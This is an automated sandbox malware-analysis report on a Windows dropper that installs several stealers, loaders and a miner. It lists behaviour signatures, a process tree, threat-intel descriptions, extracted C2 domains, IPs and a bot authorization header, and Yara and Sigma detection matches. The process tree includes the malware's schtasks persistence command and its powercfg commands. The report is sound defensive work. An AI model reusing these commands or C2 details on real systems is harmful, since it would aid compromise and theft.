Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Analysis ID:	1514956
MD5:	96cb7df578398d5d46dd4daeffbdc41f
SHA1:	7b7ecf7d006c2e2cd2b237dde3402f6b78e6c54b
SHA256:	e301b79d4279d52c49c886fcd0ab8acc3941c5cf28c7dd0eb57e8af81fe476fb
Tags:	exe
Infos:

Detection

Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected Clipboard Hijacker

Yara detected Cryptbot

Yara detected Go Injector

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PrivateLoader

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SmokeLoader

Yara detected Socks5Systemz

Yara detected Vidar

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates multiple autostart registry keys

Drops PE files to the document folder of the user

Drops large PE files

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses powercfg.exe to modify the power settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Launches processes in debugging mode, may be used to hinder debugging

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe" MD5: 96CB7DF578398D5D46DD4DAEFFBDC41F)

RegAsm.exe (PID: 7504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

j6V5568MqaTghErAlfE30BBB.exe (PID: 7888 cmdline: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe MD5: 1FEDF314D7C5ED06FF6833C9C8FE5441)

WerFault.exe (PID: 2764 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876 MD5: C31336C1EFC2CCB44B4326EA793040F2)

JxvL46JFox50ORU3tEsaxZ2Y.exe (PID: 7896 cmdline: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe MD5: D399F8ABCA97B04F273F04322E4378BE)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

kvOccCLzMNloI4W4GuGOaRuh.exe (PID: 7924 cmdline: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe MD5: 0A02550E0EA5490D4D80EE79661C99E1)

kvOccCLzMNloI4W4GuGOaRuh.tmp (PID: 5444 cmdline: "C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp" /SL5="$20408,2877196,56832,C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe" MD5: 010CD22508FA12015E83A39FEB2DB9AA)

videocompressor32.exe (PID: 2036 cmdline: "C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe" -i MD5: 8C1835DABEA53E9D98E866C950CD260D)

v7u3knm8W6_1U6jDWPH31qsx.exe (PID: 7932 cmdline: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe MD5: 8FB3610C4BA81A5A93666562E712740A)

Zt2eeOHcoNwxYT3C9R8h67os.exe (PID: 7940 cmdline: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe MD5: ABDBCC23BD8F767E671BAC6D2FF60335)

Zt2eeOHcoNwxYT3C9R8h67os.exe (PID: 3124 cmdline: "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe" MD5: ABDBCC23BD8F767E671BAC6D2FF60335)

schtasks.exe (PID: 3856 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LeVSNPB9FLpXmtLG7mcICpEf.exe (PID: 7948 cmdline: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe MD5: A463E516041F4BC84F03BC8FE2B643DD)

conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

pZhQ7nTCR9R3A5r5QIQYLapT.exe (PID: 7956 cmdline: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe MD5: 2F59FBD6623872FBDC2F63D18023BFDA)

explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

RK8ajtyf9pvKlaXEo3EjTbnu.exe (PID: 7964 cmdline: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe MD5: E8E6CD9EC48FAFCCC174F7BF07D045E2)

conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7428 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

kCxbYlQ2A6NZXLbKZjtnUx3R.exe (PID: 7972 cmdline: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe MD5: D687AF3B103399AA245807BB719878B7)

conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

h687rYoqxN2Ss_wvNXD9qqhf.exe (PID: 7984 cmdline: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe MD5: 098E15E88E5332253356C78BADF8D479)

u7IEXZpDnp1f9d_IZKWnjEtv.exe (PID: 7992 cmdline: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe MD5: D60D266E8FBDBD7794653ECF2ABA26ED)

powercfg.exe (PID: 4580 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4700 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4904 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

jsh_U9TvBUPPM2QGPo3kny24.exe (PID: 8000 cmdline: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe MD5: CB3952F1852179348F8D2DB91760D03B)

svchost.exe (PID: 1432 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 2156 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 1912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1944 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

jewkkwnf.exe (PID: 4944 cmdline: C:\ProgramData\jewkkwnf\jewkkwnf.exe MD5: ABDBCC23BD8F767E671BAC6D2FF60335)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
PrivateLoader	According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem	https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["opponnentduei.shop", "chickerkuso.shop", "sentistivowmi.shop", "metallygaricwo.shop", "quotamkdsdqo.shop", "achievenmtynwjq.shop", "milldymarskwom.shop", "carrtychaintnyw.shop", "puredoffustow.shop"], "Build id": "a8kafm--@cloudcosmic"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "3a15237aa92dcd8ccca447211fb5fc2a"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Threatname: Amadey

{"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}

Threatname: Cryptbot

{"C2 list": ["f20pt.top", "analforeverlovyu.top", "tventyvf20pt.top", "+tventyvf20pt.top", "pt.top", "@tventyvf20pt.top", "tyvf20pt.top"]}

Threatname: RedLine

{"C2 url": "193.233.255.84:4284", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001D.00000002.2552634631.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2354690717.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2425101444.00000000012EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000017.00000002.1704277964.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000011.00000002.2757239787.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.1829361336.0000000004155000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000023.00000002.2812741708.0000000002D0B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
00000011.00000000.1618173689.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x124cc:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000023.00000002.2813195969.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
0000000F.00000002.2155274987.0000000002230000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.1888965030.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
00000018.00000002.2588945166.000000000043A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe PID: 7436	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7504	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RK8ajtyf9pvKlaXEo3EjTbnu.exe PID: 7964	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 35 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
29.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.2.RegAsm.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
23.2.RegAsm.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
23.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x44fe9:$s1: file:/// 0x44f45:$s2: {11111-22222-10009-11112} 0x44f79:$s3: {11111-22222-50001-00000} 0x42141:$s4: get_Module 0x3c903:$s5: Reverse 0x3d653:$s6: BlockCopy 0x3c8cc:$s7: ReadByte 0x44ffb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
31.2.RegAsm.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
31.2.RegAsm.exe.400000.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x44fe9:$s1: file:/// 0x44f45:$s2: {11111-22222-10009-11112} 0x44f79:$s3: {11111-22222-50001-00000} 0x42141:$s4: get_Module 0x3c903:$s5: Reverse 0x3d653:$s6: BlockCopy 0x3c8cc:$s7: ReadByte 0x44ffb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
24.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x431e9:$s1: file:/// 0x43145:$s2: {11111-22222-10009-11112} 0x43179:$s3: {11111-22222-50001-00000} 0x40341:$s4: get_Module 0x3ab03:$s5: Reverse 0x3b853:$s6: BlockCopy 0x3aacc:$s7: ReadByte 0x431fb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
6.2.JxvL46JFox50ORU3tEsaxZ2Y.exe.3d45570.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
31.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
31.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.5ca3f2.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 22 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

